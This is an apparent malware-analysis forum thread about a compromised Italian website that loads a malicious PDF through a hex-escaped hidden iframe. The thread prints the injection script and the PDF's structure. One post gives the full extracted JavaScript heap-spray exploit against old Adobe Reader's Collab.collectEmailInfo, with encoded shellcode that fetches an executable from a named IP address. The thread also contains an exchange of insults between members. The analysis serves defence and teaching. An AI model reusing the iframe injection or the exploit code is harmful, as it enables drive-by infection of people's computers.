Javascript Unescaping

[boswarez]

I have been seeing a lot of sites using unescape in iframes lately. here is an example.
take
hxxp://www.gambas.it for example.

there are 2 places where they are using unescape. Once to call the url in a frameset using a document.write statement. and the other to call it outside of the frameset
Here it is:

Code: [Select]

<script language='JavaScript'>document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x32\x30\x33\x2E\x39\x32\x2E\x31\x33\x32\x2F\x64\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20'))</script>
the deobfuscated text is as follows:

Code: [Select]

http://91.203.92.132/d/index.php
How about a little further investigation...
Next thing I noticed is that it points to

Code: [Select]

http://91.203.92.132/d/cache/doc.pdfthrough an iframe. That pdf file is of course more than just a pdf.

After running strings in console on my slackware box, you can clearly see what is going on.

Code: [Select]

[novalok@host tulprod001.combine]$ strings doc.pdf
%PDF-1.3
1 0 obj
<</OpenAction <</JS (this.vcfcd208495d565e\(\))
/S /JavaScript
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
/ViewerPreferences <</PageDirection /L2R
/PageLayout /SinglePage
/AcroForm 5 0 R
/Dests 6 0 R
/Names 7 0 R
/Type /Catalog
endobj
2 0 obj
endobj
3 0 obj
<</Type /Outlines
/Count 0
endobj
4 0 obj
<</Resources 8 0 R
/Kids [9 0 R]
/Type /Pages
/Count 1
endobj
5 0 obj
<</Fields []
endobj
6 0 obj
<<>>
endobj
7 0 obj
<</JavaScript 10 0 R
endobj
8 0 obj
<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
endobj
9 0 obj
<</Rotate 0
/Parent 4 0 R
/MediaBox [0 0 595.28000 841.89000]
/TrimBox [0 0 595.28000 841.89000]
/Resources 8 0 R
/Type /Page
/Contents 11 0 R
endobj
10 0 obj
<</Names [(New_Script) 12 0 R]
endobj
11 0 obj
<</Filter /FlateDecode
/Length 36
stream
3P0P0
000P
endstream
endobj
13 0 obj
<</Filter /FlateDecode
/Length 3295
stream
p@      H{
}VIT
Og7=
AF[c
gEH@W
i4'd!
#$`R@$g
"Rdb
GS W
p'nz.
Aa7F
ldtr
o0b4
tR.Ai
:~37
89/DL
wI9I9JG2
endstream
endobj
12 0 obj
<</JS 13 0 R
/S /JavaScript
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000262 00000 n
0000000280 00000 n
0000000325 00000 n
0000000398 00000 n
0000000429 00000 n
0000000449 00000 n
0000000488 00000 n
0000000554 00000 n
0000000715 00000 n
0000000765 00000 n
0000001941 00000 n
0000000872 00000 n
0000001988 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
startxref
2189
%%EOF

If you havent already, please update your version of adobe reader as it executes javascript that it shouldnt.
Any questions, just hit me up

[bobby]

That is a wrong way to analyze a PDF file, and your results are not conclusive.
You should inflate the stream from that PDF, to se what you have hidden in the stream.

After you get the decompressed stream, you should take a look what the shellcode from the stream does.
The shellcode downloads the following EXE file:
91.203.92.132/d/load.php?pdf=72b32a1f754ba1c09b3695e0cb6cde7f

[boswarez]

well i did as much as i possibly could on a linux box without wine.
And btw I did nothing wrong you idiot. how dare you say i do things the wrong way. everyone's analysis process is different. next time you decide to post, why not think about what you say first.

[MysteryFCM]

First and foremost, being abusive to others on this board is NOT in your best interests if you want to continue being welcome here. I suggest, next time someone offers you constructive criticism, that YOU think before YOU post.

Secondly, you DID do something wrong;

1. As far as your post, you should ALWAYS delinkify a malcious URL. This both prevents search engines picking it up, and prevents users accidentally clicking it.

2. You DID NOT correctly perform analysis on the malicious PDF. Using a Linux box, you actually have MUCH better tools you could use for the analysis;

http://www.sudosecure.net/archives/313

Using a Windows box, Bobby outlined the method at;

http://www.malwaredomainlist.com/forums/index.php?topic=2139.0

[philipp]

well i did as much as i possibly could on a linux box without wine.
And btw I did nothing wrong you idiot. how dare you say i do things the wrong way. everyone's analysis process is different. next time you decide to post, why not think about what you say first.

1. you could have used pdftk on your 'linux box' to get the javascript:

Code: [Select]

{
var vc4ca4238a0b9238 = new Array();

function vc81e728d9d4c2f6(veccbc87e4b5ce2f, va87ff679a2f3e71)
{
while (veccbc87e4b5ce2f.length * 2 < va87ff679a2f3e71)
{
veccbc87e4b5ce2f += veccbc87e4b5ce2f;
}

veccbc87e4b5ce2f = veccbc87e4b5ce2f.substring(0, va87ff679a2f3e71 / 2);

return veccbc87e4b5ce2f;
}

function ve4da3b7fbbce234()
{
var v1679091c5a880fa = 0x0c0c0c0c;

var v8f14e45fceea167 = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u392F%u2E31%u3032%u2E33%u3239%u312E%u3233%u642F%u6C2F%u616F%u2E64%u6870%u3F70%u6470%u3D66%u3237%u3362%u6132%u6631%u3537%u6234%u3161%u3063%u6239%u3633%u3539%u3065%u6263%u6336%u6564%u6637");

var vc9f0f895fb98ab9 = 0x400000;

var v45c48cce2e2d7fb = v8f14e45fceea167.length * 2;

var va87ff679a2f3e71 = vc9f0f895fb98ab9 - (v45c48cce2e2d7fb + 0x38);

var veccbc87e4b5ce2f = unescape("%u9090%u9090");

veccbc87e4b5ce2f = vc81e728d9d4c2f6(veccbc87e4b5ce2f, va87ff679a2f3e71);

var vd3d9446802a4425 = (v1679091c5a880fa - 0x400000) / vc9f0f895fb98ab9;

for (var v6512bd43d9caa6e = 0; v6512bd43d9caa6e < vd3d9446802a4425; v6512bd43d9caa6e++)
{
vc4ca4238a0b9238[v6512bd43d9caa6e] = veccbc87e4b5ce2f + v8f14e45fceea167;
}
}


function vc20ad4d76fe9775()
{
var vc51ce410c124a10 = app.viewerVersion.toString();

vc51ce410c124a10 = vc51ce410c124a10.replace(/\D/g, "");

var vaab3238922bcc25 = new Array(vc51ce410c124a10.charAt(0), vc51ce410c124a10.charAt(1), vc51ce410c124a10.charAt(2));

if ((vaab3238922bcc25[0] == 8 && ((vaab3238922bcc25[1] == 1 && vaab3238922bcc25[2] < 2) || vaab3238922bcc25[1] < 1)) || (vaab3238922bcc25[0] == 7 && vaab3238922bcc25[1] < 1) || (vaab3238922bcc25[0] < 7))
{
ve4da3b7fbbce234();

var v9bf31c7ff062936 = unescape("%u0c0c%u0c0c");

while(v9bf31c7ff062936.length < 44952) v9bf31c7ff062936 += v9bf31c7ff062936;

this.collabStore = Collab.collectEmailInfo({subj: "", msg: v9bf31c7ff062936});
}
}

vc20ad4d76fe9775();
}

2. then you could have easily decoded the shellcode with perl to get the url:

Code: [Select]

http://91.203.92.132/d/load.php?pdf=72b32a1f754ba1c09b3695e0cb6cde7f

3. dont call others 'idiots' when you dont know what you are talking about

4. you better go search another community and try to show off there

[sowhat-x]

next time you decide to post, why not think about what you say first.

I agree 100% with that part -> banned for flaming towards other members.

how dare you say i do things the wrong way.

Well,what can we do for that now...what's done,is done...he actually dared...  

PS:By the way,i see you've been a quite 'naughty boy' out there in the net...

[bobby]

@boswarez
Even if you call me idiot, I will not be mad about that. Nah, I have survived wars, I will survive this too.
My English is far from perfect, and I can't express the right way my exact thoughts.
I just wanted to point you to the weak points of your analysis.
I can compile some of my tools for Linux if needed, but that is for another topic.

[sowhat-x]

Lol,bobby...I would even place a bet this would gonna happen...
as all people around more or less are friendly towards newcomers.
This guy though...except from having an "attitude",
also seems to have been a bit naughty out there...